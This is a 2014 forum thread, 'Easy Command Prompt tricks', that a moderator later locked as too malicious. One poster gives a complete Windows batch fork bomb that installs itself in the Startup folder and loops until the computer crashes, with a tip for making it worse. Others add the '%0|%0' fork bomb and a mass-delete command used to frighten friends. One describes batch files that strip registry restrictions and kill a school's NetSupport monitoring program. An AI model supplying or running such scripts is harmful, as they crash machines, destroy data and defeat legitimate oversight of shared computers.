Easy Command Prompt tricks

  • NF
    6th May 2014 Member 0 Permalink

    @h4zardz1 (View Post)

     Did you add a command script?

    Edited once by NUCLEAR_FOX. Last: 6th May 2014
  • h4zardz1
    6th May 2014 Member 0 Permalink
    yeah. do you see it?
    @h4zardz1 (View Post)
  • konsole
    6th May 2014 Member 0 Permalink

    @echo off

    copy "%0" "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

    :s

    start "%0"

    goto s

     

    This continuously creates instances of cmd.exe until your computer crashes, and then runs on startup as well as wasting loads of disk space. For extra violence, place the second command inside the loop.

  • therocketeer
    6th May 2014 Member 1 Permalink
    type del c:\*
    infront of some of your friends on some computer and threaten to enter Y
    (it won't actually delete c:\ anyway because its a file system)


    Edited once by therocketeer. Last: 6th May 2014
  • NF
    6th May 2014 Member 0 Permalink

    @h4zardz1 (View Post)

     Yeah I just seen it over my moms phone. 

     

    @therocketeer (View Post)

     I really don't trust that one.

  • belugawhale
    7th May 2014 Member 0 Permalink

    %0|%0 is always fun.

    At school, some friends and I love to hold down Ctrl-Shift-Esc to spam the message box "Task Manager has been disabled by your administrator" on each other's computers. But i created a batch file that closes all of them at once.

    I have a batch file that deletes many registry keys that disable useful functions (right-clicking, task manager, cmd, run, etc.)

    I also have one that kills the spying program (for me it is NetSupport) that I compiled into a .exe.

Locked by jacob1: too many malicious commands :P